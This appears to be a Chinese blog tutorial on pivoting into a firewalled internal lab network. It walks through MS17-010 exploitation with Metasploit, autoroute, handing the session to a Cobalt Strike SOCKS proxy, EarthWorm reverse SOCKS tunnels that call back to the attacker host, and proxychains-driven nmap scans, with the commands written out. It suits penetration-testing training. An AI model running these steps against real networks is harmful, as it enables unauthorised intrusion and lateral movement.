内网渗透之多种方式实现内网穿透(详细)

整个环境的拓扑如下:
1)两个win7主机都开启防火墙,开启445端口。内网穿透以ms17_010为突破点。
2)防火墙的配置,允许外网区域访问DMZ区,禁止访问内网,允许内网访问外网和dmz,允许dmz访问外网和dmz。
内网渗透之多种方式实现内网穿透(详细)_第1张图片
一、metasploit跳板路由

1)使用ms17_010_enternalbule获得meterpreter权限,在这里注意,设置payload是必须的,否则不能获得metepreter权限,直接弹到shell
内网渗透之多种方式实现内网穿透(详细)_第2张图片
内网渗透之多种方式实现内网穿透(详细)_第3张图片

2)获取meterpreter,创建跳板路由:
run autoroute -s 192.168.10.0/24 创建路由
run autoroute -p 打印路由[在这里插入图片描述]
内网渗透之多种方式实现内网穿透(详细)_第4张图片
3)输入background退回metaploit可以看到已经创建链接
在这里插入图片描述

4)再次利用ms17_010攻击内网靶机,可见攻击成功,攻击方式和上述一样
内网渗透之多种方式实现内网穿透(详细)_第5张图片二、cobalt strike 跳板路由实现内完成穿透

1)从metaploit中获取beacon:在cobalt strike中设置监听器,监听器类型为http _beacon
在这里插入图片描述
2)在metasploit中已经获取到session 后进行以下操作,转义session到中,设置的lport为在cobalt strike中设置的port
在这里插入图片描述
内网渗透之多种方式实现内网穿透(详细)_第6张图片
在这里插入图片描述
3)创建socks代理,
在这里插入图片描述
4)点击代理信息
内网渗透之多种方式实现内网穿透(详细)_第7张图片
5)复制信息到msf
内网渗透之多种方式实现内网穿透(详细)_第8张图片
6)打开msf输入setg Proxies socks4:127.0.0.1:8088
在这里插入图片描述
7)然后就可以添加扫描模块对内网进行扫描

三、socks +proxychains内网杀器

推荐一篇文章:通过SOCKS代理渗透整个内网
再推荐一篇:内网漫游之SOCKS代理大结局
再来一篇:内网穿透大杀器–EarthWorm
接着:内网穿透大杀器–EarthWorm
1、简单的earthworm+sockscap
两台主机:192.168.15.236 ,192.168.15.239 ,其中在239主机上开启子网虚拟机,ip地址为192.168.1.129,236主机不能直接访问。
1)在236主机上开启earthworm: ew.exe -s rcsocks -l 1008 -e 9996在这里插入图片描述
2)在239主机上开启earthworm:ew.exe -s rssocks -d 192.168.15.236 -e 9996
在这里插入图片描述
3)在236主机开启sockscap,配置代理信息
内网渗透之多种方式实现内网穿透(详细)_第9张图片
4)通过代理即可访问主机1.129主机的信息

2,proxychains + earthworm 穿透内网
测试环境和上面一样,proxychains默认解析DNS为4.2.2.2 ,因此proxychains解析需要在有网络的环境实现
1) 在,15.236主机上开启kali虚拟机,ip 192.168.15.128,在kali上开启earthworm :

./ew_for_Linux32 -s rcsocks -l 1080 -e 9996

在这里插入图片描述
2)在主机192.168.15.239上开启earthworm
在这里插入图片描述
3)配置proxychains
设置 /etc/proxychains.conf的配置文件,在文件中添加代理信息:socks5 127.0.0.1 1080
4)测试代理是否正常:正常解析的话可以进行扫描

cp /usr/lib/proxychains3/proxyresolv /usr/bin/
proxyresolv 192.168.1.129

5)使用nmap扫描:注意proxychains不支持udp和icmp
proxychains nmap -sT -Pn 192.168.1.129 -p 21,22,23,25,80,135,446,3389
6)代理启动msf:
解决数据库连接不上,在 /etc/proxychains.conf 文件中添加

localnet 127.0.0.1 000 255.255.255.255

内网渗透之多种方式实现内网穿透(详细)_第10张图片

你可能感兴趣的:(工具使用)